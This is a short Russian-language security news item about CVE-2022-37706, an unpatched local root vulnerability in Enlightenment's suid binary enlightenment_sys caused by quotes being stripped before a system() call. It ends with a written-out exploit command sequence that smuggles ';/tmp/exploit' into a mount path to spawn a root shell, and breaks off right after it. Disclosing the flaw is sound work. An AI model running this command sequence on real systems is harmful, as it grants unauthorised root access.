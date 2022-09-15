В пользовательском окружении Enlightenment выявлена уязвимость (CVE-2022-37706), позволяющая непривилегированному локальному пользователю выполнить код с правами root. Уязвимость пока не исправлена (0-day), но в открытом доступе уже имеется эксплоит, протестированный в Ubuntu 22.04.

Проблема присутствует в исполняемом файле enlightenment_sys, поставляемом с флагом suid root и выполняющем через вызов system() определённые разрешённые команды, такие как монтирование накопителя утилитой mount. Из-за некорректной работы функции, формирующей строку, передаваемую в вызов system(), из аргументов запускаемой команды вырезаются кавычки, что можно использоваться для запуска своего кода. Например, при запуске

mkdir -p /tmp/net mkdir -p "/tmp/;/tmp/exploit" echo "/bin/sh" > /tmp/exploit chmod a+x /tmp/exploit enlightenment_sys /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net